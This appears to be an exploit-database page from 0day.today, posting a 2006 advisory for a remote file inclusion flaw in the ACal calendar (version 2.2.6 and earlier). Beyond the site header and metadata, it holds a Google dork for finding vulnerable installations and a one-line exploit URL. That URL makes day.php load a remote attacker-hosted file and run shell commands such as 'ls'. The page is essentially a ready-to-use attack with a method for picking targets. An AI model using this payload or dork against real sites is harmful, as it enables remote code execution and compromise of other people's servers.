[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability

Author
PiNGuX
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-406
Category
web applications
Date add
06-05-2006
Platform
unsorted
===========================================================
ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability
===========================================================





$*******************************************$
$ Title: ACal 2.2.6 <= Remote File Inclusion $
$*******************************************$
$ URL: http://acalproj.sourceforge.net/ $
$***************************************$
$ Dork: intitle:"Login to Calendar" $
$***********************************$
$ Credits: PiNGuX $
$*****************$
$ Greetz : [0o] $
$***************$

Exploit:
http://[url]/[calendar_path]/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls



#  0day.today [2024-12-27]  #